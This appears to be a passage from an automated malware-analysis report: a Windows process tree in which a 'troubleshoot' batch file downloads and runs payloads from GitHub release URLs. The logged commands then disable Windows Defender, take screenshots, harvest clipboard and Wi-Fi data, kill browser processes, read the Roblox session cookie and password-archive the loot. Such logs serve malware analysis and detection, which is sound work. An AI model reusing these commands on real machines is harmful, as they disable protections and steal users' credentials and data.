    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1952,i,13665676910899697755,15000271213741133251,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2064 /prefetch:3
    3⤵
    PID:2080
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,13665676910899697755,15000271213741133251,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2576 /prefetch:8
    3⤵
    PID:2744
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3052,i,13665676910899697755,15000271213741133251,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3088 /prefetch:1
    3⤵
    PID:2144
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3056,i,13665676910899697755,15000271213741133251,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3332 /prefetch:1
    3⤵
    PID:560
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4916,i,13665676910899697755,15000271213741133251,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4932 /prefetch:8
    3⤵
    PID:4940
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5268,i,13665676910899697755,15000271213741133251,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5260 /prefetch:8
    3⤵
    PID:1200
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\wtc.cmd"
  2⤵
  PID:740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Write-Host 'Troubleshoot started...' -ForegroundColor Green"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "[void](New-Item -ItemType Directory -Force -Path 'C:\l')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:340
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/o2ojy6eyu/win1/releases/download/v1/wts.zip' -OutFile 'C:\l\winup.zip'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\l\winup.zip', 'C:\l')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Start-Process 'C:\l\wts.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4616
  - - C:\l\wts.exe
      "C:\l\wts.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2480
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri "https://github.com/newbigs/newintsh/releases/download/v1/jCLjDWsLU" -OutFile "C:\Users\Public\Guard.exe""
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1856
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3112
      - C:\Users\Public\Guard.exe
        
        "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5736
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Start-Process 'C:\l\winb.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2884
  - - C:\l\winb.exe
      "C:\l\winb.exe"
      4⤵
      Executes dropped EXE
      PID:3048
    - - C:\l\winb.exe
        
        "C:\l\winb.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4536
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\l\winb.exe'"
        6⤵
        
        PID:4392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\l\winb.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4364
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        6⤵
        
        PID:1384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4800
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('.', 0, 'windows', 48+16);close()""
        6⤵
        
        PID:2100
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('.', 0, 'windows', 48+16);close()"
        7⤵
        
        PID:2036
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‎.scr'"
        6⤵
        
        PID:916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‎.scr'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4324
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:4132
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:4232
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:668
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:1200
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        6⤵
        
        PID:5180
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        7⤵
        
        PID:5940
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        6⤵
        Clipboard Data
        
        PID:5228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        7⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:6012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:5244
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:6080
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5260
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:6032
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5280
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6060
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:5328
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:5564
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        6⤵
        
        PID:5472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6088
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ppew0t1j\ppew0t1j.cmdline"
        8⤵
        
        PID:5396
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F13.tmp" "c:\Users\Admin\AppData\Local\Temp\ppew0t1j\CSC20370FCBE69645B69CD7DFA9484CC25.TMP"
        9⤵
        
        PID:5372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5576
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5620
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5848
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5380
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5220
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:6052
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5988
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5180
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5216
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5616
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5032"
        6⤵
        
        PID:5920
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5032
        7⤵
        Kills process with taskkill
        
        PID:5280
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2032"
        6⤵
        
        PID:5484
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2032
        7⤵
        Kills process with taskkill
        
        PID:312
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1140"
        6⤵
        
        PID:5960
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1140
        7⤵
        Kills process with taskkill
        
        PID:6032
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2080"
        6⤵
        
        PID:5224
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2080
        7⤵
        Kills process with taskkill
        
        PID:5668
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2744"
        6⤵
        
        PID:5160
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2744
        7⤵
        Kills process with taskkill
        
        PID:5752
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2144"
        6⤵
        
        PID:4276
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2144
        7⤵
        Kills process with taskkill
        
        PID:5208
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 560"
        6⤵
        
        PID:1064
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 560
        7⤵
        Kills process with taskkill
        
        PID:5368
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        6⤵
        
        PID:6016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5592
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        6⤵
        
        PID:5532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5784
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        6⤵
        
        PID:4176
        
        C:\Windows\system32\getmac.exe
        
        getmac
        7⤵
        
        PID:3112
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI30482\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\kR2Sz.zip" *"
        6⤵
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\_MEI30482\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI30482\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\kR2Sz.zip" *
        7⤵
        Executes dropped EXE
        
        PID:5468
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        6⤵
        
        PID:2044
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        7⤵
        
        PID:368
      - C:\Windows\system32\cmd.exe
        
